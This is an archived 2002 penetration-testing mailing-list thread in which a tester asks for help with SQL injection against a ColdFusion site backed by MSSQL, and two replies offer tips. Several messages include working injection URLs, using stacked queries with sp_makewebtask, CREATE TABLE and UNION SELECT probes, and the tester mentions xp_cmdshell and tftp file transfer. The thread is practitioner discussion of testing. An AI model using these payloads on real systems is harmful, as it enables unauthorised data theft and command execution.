Penetration Testing mailing list archives
Re: SQL INJECTION IN Coldfusion
From: "wirepair" <wirepair () roguemail net>
Date: Tue, 17 Sep 2002 06:59:55 -0700
you may also want to try:UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro-- or 4 if it is four lines ect.
On Fri, 13 Sep 2002 19:04:37 -0700 (PDT) Cesar <cesarc56 () yahoo com> wrote:
Hi. You must use UNION ALL to get all the rows. For new techniques take a look a this paper: Manipulating MS Sql Server using sql injection. http://www.appsecinc.com/news/briefing.html#inject Cesar. --- Mr Ro <vnmrro () yahoo com> wrote:hello pen-tester, I am dealing with a pen-test agains a CFM server with MSSQL as backend. It is vulnerable with direct SQL injection. I figure out that I can create,drop...table, execute xp_cmdshell, sp_makewebtask, so i submit: submit: http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"-- it's okay, and I want to get "C:\winnt\temp\blah.htm". I submit: http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))-- and then, I submit: http://mysite/file.cfm?id=4567 UNION SELECT line from mrro-- it returns an error complain that "All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists." so I keep adding "line" in my request url (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--), finally it returns an error message like this: "[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image data type cannot be selected as DISTINCT."question here: who can explain me what happened ?I know there is another way to download or upload files using "tftp", so is there any free "tftp" serverfor me to use instead of installing a new one ? thank for reading.best regards mrro __________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/__________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com ----------------------------------------------------------------------------This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see:https://alerts.securityfocus.com/
_____________________________ For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf> ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Re: SQL INJECTION IN Coldfusion Cesar (Sep 16)
- Re: SQL INJECTION IN Coldfusion wirepair (Sep 18)